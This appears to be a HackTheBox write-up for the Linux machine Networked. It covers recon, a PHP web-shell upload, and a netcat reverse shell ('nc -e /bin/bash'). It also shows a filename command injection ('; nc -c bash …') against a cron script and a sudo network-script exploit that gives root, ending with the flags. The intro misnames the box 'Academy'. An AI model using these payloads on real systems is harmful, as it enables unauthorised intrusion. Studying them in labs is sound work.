Networked

#Linux #Enumeration #Command-Injection #UserPivoting #Sudo-Exploitation

Academy is an easy-rated Linux machine from HackTheBox, created by guly. In the current post, my IP is 10.10.14.56, and the target IP is 10.129.170.0

There is nothing complex in the machine Networked, there is a file upload bypass, leading to code execution, here there are many available techniques due to the lack of sanitization. And inside the machine you exploit a crontab and then a poor configured network configuration script.

Recon

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

Local Terminal

$ ping -c 1 10.129.170.0

Pinging 10.129.170.0 with 32 bytes of data:
Reply from 10.129.170.0: bytes=32 time=180ms TTL=63
Reply from 10.129.170.0: bytes=32 time=160ms TTL=63
Reply from 10.129.170.0: bytes=32 time=165ms TTL=63
Reply from 10.129.170.0: bytes=32 time=189ms TTL=63

Ping statistics for 10.129.170.0:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 160ms, Maximum = 189ms, Average = 173ms

By the TTL, we can assume that is a Linux Machine.

Local Terminal

$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.170.0

Nmap scan report for 10.129.170.0
Host is up, received echo-reply ttl 63 (0.19s latency).
Scanned at 2023-06-09 10:08:48 Pacific SA Standard Time for 27s
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 27.10 seconds
           Raw packets sent: 131055 (5.766MB) | Rcvd: 47 (2.932KB)

Local Terminal

$ nmap -sCV -p 22,80 10.129.170.0

Nmap scan report for 10.129.170.0
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.18 seconds/nmap.org/submit/ .

Information that we have now: It's a website (port 80) that use Apache/2.4.6,

Local Terminal

$ whatweb 10.129.170.0
http://10.129.170.0 [200 OK] Apache[2.4.6], Country[RESERVED][ZZ], 
HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[10.129.170.0], 
PHP[5.4.16], X-Powered-By[PHP/5.4.16]

• Browser > http://10.129.170.0

Nothing relevant

Local Terminal

wfuzz -c -t 200 --hc=404 -w /shared/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.170.0/FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.129.170.0/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000150:   301        7 L      20 W       236 Ch      "uploads"
000001612:   301        7 L      20 W       235 Ch      "backup"

• /uploads/ > Nothing

• /backup/ > There is a file, download backup.tar, inside the .tar file you can find four files, index.php, lib.php, photos.php and upload.php

  • Index.php > Front page

  • lib.php > Nothing

  • photos.php > photo gallery, if you can upload, this will be useful.

  • upload.php > you can upload files, this is the most valuable place by now.

Reverse Shell [apache]

Go to http://10.129.170.0/upload.php and upload any image

http://10.129.170.0/photos.php

As you can see, we can visualice the images uploaded, we want to exploit this. Intercept a file upload.

Interception result, it shows the uploaded file in a raw format

Now that we know that uploading files is an alternative, our best option is to inject a php command. Add "<?php system($_GET['cmd]); ?>" at the 3rd row, or anywhere. And upload the image.

Sample with the payload

• Browser > http://10.129.170.0/photos.php

Nothing, but before by fuzzing we found a blank site called /uploads/

• Browser > http://10.129.170.0/uploads/10_10_14_56.jpg

The image is alone, great, this means that we can apply the command through 'cmd'.

• Browser > http://10.129.170.0/uploads/10_10_14_56.php.jpg?cmd=id

It works, let's connect through netcat

Local Terminal

nc -nlvp 443

• Browser > http://10.129.170.0/uploads/10_10_14_56.php.jpg?cmd=nc -e /bin/bash 10.10.14.56 443

And we are in! Let's do a bash upgrade

User Pivot [Guly]

Basic scouting

Target Terminal [apache]

bash-4.2$ id
uid=48(apache) gid=48(apache) groups=48(apache)

bash-4.2$ whoami
apache

bash-4.2$ hostname -I
10.129.170.0 dead:beef::250:56ff:feb9:94b9

bash-4.2$ cd /home
bash-4.2$ ls
guly

So there is one user, maybe we can enter to that folder

Target Terminal [apache]

bash-4.2$ cd guly              # :o
bash-4.2$ ls
check_attack.php  crontab.guly  user.txt

bash-4.2$ cat user.txt         # :(
cat: user.txt: Permission denied

Ok, we need to change the user...

Target Terminal [apache]

$ cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php

$ ls -l
total 12
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php

This is interesting, it execute the command check_attack.php by using another user (Guly) each 3 minutes

$ cat check_attack.php

check_attack.php

<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/'; # Take note of the PATH!
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n"; # It removes directly, maybe we can inject commands
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>

Target Terminal [apache]

bash-4.2$ ls -l
total 12
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php

And it's executed by root

Target Terminal [apache]

cd /var/www/html/uploads/

Open a new local terminal, and prepare a listening netcat

Local Terminal

nc -nlvp 444

Target Terminal [apache]

bash-4.2$ touch '; nc -c bash 10.10.14.56 444'
bash-4.2$ ls -l

total 116
-rw-r--r--  1 apache apache 46961 Jun  9 21:57 10_10_14_56.jpg
-rw-r--r--  1 apache apache 46961 Jun  9 22:34 10_10_14_56.php.jpg
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_1.png
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_2.png
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_3.png
-rw-r--r--. 1 root   root    3915 Oct 30  2018 127_0_0_4.png
-rw-r--r--  1 apache apache     0 Jun  9 22:55 ; nc -c bash 10.10.14.56 444
-r--r--r--. 1 root   root       2 Oct 30  2018 index.html

And there is our file... now we wait, crontab.guly says that it will execute after some time.

Apply a bash upgrade and continue.

Target Terminal [guly]

[guly@networked ~]$ cat /home/guly/user.txt
70680e5809fd6d3350e0c432938dd588

Privileges Escalation

Target Terminal [guly]

[guly@networked ~]$ id
uid=1000(guly) gid=1000(guly) groups=1000(guly)

[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh

Looks like we can execute that custom .sh file as root, let's what's inside

Target Terminal [guly]

cat /usr/local/sbin/changename.sh

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF # It reads the network-script folder.
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do # There is a interaction with the user
        echo "interface $var:"
        read x # We can inject a command here
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

It reads the network-script folder.

Target Terminal [guly]

[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
a bash #write this.
interface PROXY_METHOD:
a
interface BROWSER_ONLY:
a
interface BOOTPROTO:
a

Target Terminal [root]

[root@networked network-scripts]$ cat /root/root.txt
666702788dadb24f434a7dde10258ce5